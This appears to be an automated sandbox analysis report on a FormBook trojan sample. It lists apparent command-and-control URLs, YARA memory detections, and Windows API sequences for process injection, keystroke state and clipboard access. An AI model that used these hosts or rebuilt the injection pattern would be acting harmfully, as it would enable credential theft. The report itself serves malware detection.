6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:07:59 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: ROUTE.EXE, 00000007.00000002.3231147711.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3229283746.0000000003D86000.00000004.10000000.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000003276000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=1
                Source: ROUTE.EXE, 00000007.00000002.3231147711.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3229283746.0000000003D86000.00000004.10000000.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000003276000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=2
                Source: ROUTE.EXE, 00000007.00000002.3231147711.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3229283746.0000000003D86000.00000004.10000000.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000003276000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/sk-logabpstatus.php?a=bFp4ODVzaXVsTFczSDdQcmZwbFVZRVY1RlBJVDJnQi9jS1A1dmQ1d
                Source: firefox.exe, 0000000B.00000002.2009532526.0000000027D34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://einpisalpace.shop/
                Source: YLmLMhEKNXTfg.exe, 00000008.00000002.3229916982.00000000051CF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pitaloka.xyz
                Source: YLmLMhEKNXTfg.exe, 00000008.00000002.3229916982.00000000051CF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pitaloka.xyz/iwk9/
                Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000003276000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ROUTE.EXE, 00000007.00000002.3226358408.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: ROUTE.EXE, 00000007.00000002.3226358408.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ROUTE.EXE, 00000007.00000003.1895708485.0000000007915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: ROUTE.EXE, 00000007.00000002.3226358408.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: ROUTE.EXE, 00000007.00000002.3226358408.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: ROUTE.EXE, 00000007.00000002.3226358408.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: ROUTE.EXE, 00000007.00000002.3226358408.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ROUTE.EXE, 00000007.00000002.3229283746.000000000423C000.00000004.10000000.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.000000000372C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.dejikenkyu.cyou/58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5Hp
                Source: ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D44164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00D44164
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D44164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00D44164
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D43F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00D43F66
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00D3001C
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D5CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00D5CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3226300583.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3225975390.0000000000720000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1711994414.00000000069E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3227836129.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3229916982.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3227680610.0000000005F40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1711288888.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1716772538.00000000088D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: This is a third-party compiled AutoIt script.0_2_00CD3B3A
                Source: gH3LlhcRzg.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: gH3LlhcRzg.exe, 00000000.00000000.1372592377.0000000000D84000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_98661040-2
                Source: gH3LlhcRzg.exe, 00000000.00000000.1372592377.0000000000D84000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_29763d4d-5
                Source: gH3LlhcRzg.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8d0d1c10-0
                Source: gH3LlhcRzg.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_95cf5834-3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C3D3 NtClose,2_2_0042C3D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B60 NtClose,LdrInitializeThunk,2_2_03472B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03472DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03472C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,2_2_034735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474340 NtSetContextThread,2_2_03474340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474650 NtSuspendThread,2_2_03474650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BE0 NtQueryValueKey,2_2_03472BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BF0 NtAllocateVirtualMemory,2_2_03472BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B80 NtQueryInformationFile,2_2_03472B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BA0 NtEnumerateValueKey,2_2_03472BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AD0 NtReadFile,2_2_03472AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AF0 NtWriteFile,2_2_03472AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AB0 NtWaitForSingleObject,2_2_03472AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F60 NtCreateProcessEx,2_2_03472F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F30 NtCreateSection,2_2_03472F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FE0 NtCreateFile,2_2_03472FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F90 NtProtectVirtualMemory,2_2_03472F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FA0 NtQuerySection,2_2_03472FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FB0 NtResumeThread,2_2_03472FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E80 NtReadVirtualMemory,2_2_03472E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EA0 NtAdjustPrivilegesToken,2_2_03472EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D00 NtSetInformationFile,2_2_03472D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D10 NtMapViewOfSection,2_2_03472D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D30 NtUnmapViewOfSection,2_2_03472D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DD0 NtDelayExecution,2_2_03472DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DB0 NtEnumerateKey,2_2_03472DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C60 NtCreateKey,2_2_03472C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C00 NtQueryInformationProcess,2_2_03472C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CC0 NtQueryVirtualMemory,2_2_03472CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CF0 NtOpenProcess,2_2_03472CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CA0 NtQueryInformationToken,2_2_03472CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473010 NtOpenDirectoryObject,2_2_03473010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473090 NtSetValueKey,2_2_03473090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034739B0 NtGetContextThread,2_2_034739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D70 NtOpenThread,2_2_03473D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D10 NtOpenProcessToken,2_2_03473D10
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03254340 NtSetContextThread,LdrInitializeThunk,7_2_03254340
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03254650 NtSuspendThread,LdrInitializeThunk,7_2_03254650
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252B60 NtClose,LdrInitializeThunk,7_2_03252B60
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_03252BA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252BE0 NtQueryValueKey,LdrInitializeThunk,7_2_03252BE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03252BF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252AF0 NtWriteFile,LdrInitializeThunk,7_2_03252AF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252AD0 NtReadFile,LdrInitializeThunk,7_2_03252AD0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252F30 NtCreateSection,LdrInitializeThunk,7_2_03252F30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252FB0 NtResumeThread,LdrInitializeThunk,7_2_03252FB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252FE0 NtCreateFile,LdrInitializeThunk,7_2_03252FE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_03252E80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252EE0 NtQueueApcThread,LdrInitializeThunk,7_2_03252EE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_03252D30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03252D10
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03252DF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252DD0 NtDelayExecution,LdrInitializeThunk,7_2_03252DD0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252C60 NtCreateKey,LdrInitializeThunk,7_2_03252C60
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03252C70
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03252CA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032535C0 NtCreateMutant,LdrInitializeThunk,7_2_032535C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032539B0 NtGetContextThread,LdrInitializeThunk,7_2_032539B0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252B80 NtQueryInformationFile,7_2_03252B80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252AB0 NtWaitForSingleObject,7_2_03252AB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252F60 NtCreateProcessEx,7_2_03252F60
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252FA0 NtQuerySection,7_2_03252FA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252F90 NtProtectVirtualMemory,7_2_03252F90
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252E30 NtWriteVirtualMemory,7_2_03252E30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252EA0 NtAdjustPrivilegesToken,7_2_03252EA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252D00 NtSetInformationFile,7_2_03252D00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252DB0 NtEnumerateKey,7_2_03252DB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252C00 NtQueryInformationProcess,7_2_03252C00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252CF0 NtOpenProcess,7_2_03252CF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03252CC0 NtQueryVirtualMemory,7_2_03252CC0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03253010 NtOpenDirectoryObject,7_2_03253010
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03253090 NtSetValueKey,7_2_03253090
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03253D10 NtOpenProcessToken,7_2_03253D10
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03253D70 NtOpenThread,7_2_03253D70
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_00748E70 NtCreateFile,7_2_00748E70
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_00748FE0 NtReadFile,7_2_00748FE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_007490E0 NtDeleteFile,7_2_007490E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_00749180 NtClose,7_2_00749180
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_007492E0 NtAllocateVirtualMemory,7_2_007492E0
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00D3A1EF
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D28310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00D28310
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D351BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00D351BD
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CDE6A00_2_00CDE6A0
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CFD9750_2_00CFD975
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF21C50_2_00CF21C5
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D062D20_2_00D062D2
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D503DA0_2_00D503DA
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D0242E0_2_00D0242E
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF25FA0_2_00CF25FA
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CE66E10_2_00CE66E1
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D2E6160_2_00D2E616
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D0878F0_2_00D0878F
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D388890_2_00D38889
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D508570_2_00D50857
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D068440_2_00D06844
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CE88080_2_00CE8808
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CFCB210_2_00CFCB21
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D06DB60_2_00D06DB6
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CE6F9E0_2_00CE6F9E
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CE30300_2_00CE3030
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CFF1D90_2_00CFF1D9
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF31870_2_00CF3187
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CD12870_2_00CD1287
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF14840_2_00CF1484
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CE55200_2_00CE5520
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF76960_2_00CF7696
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CE57600_2_00CE5760
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF19780_2_00CF1978
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D09AB50_2_00D09AB5
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CDFCE00_2_00CDFCE0
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D57DDB0_2_00D57DDB
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF1D900_2_00CF1D90
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CFBDA60_2_00CFBDA6
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CE3FE00_2_00CE3FE0
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CDDF000_2_00CDDF00
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_013C36700_2_013C3670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004183132_2_00418313
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011F02_2_004011F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E9F32_2_0042E9F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FB1A2_2_0040FB1A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FB232_2_0040FB23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FD432_2_0040FD43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DD532_2_0040DD53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041650F2_2_0041650F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004165132_2_00416513
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004045E52_2_004045E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DE972_2_0040DE97
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DEA32_2_0040DEA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027402_2_00402740
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FD02_2_00402FD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA3522_2_034FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F02_2_0344E3F0
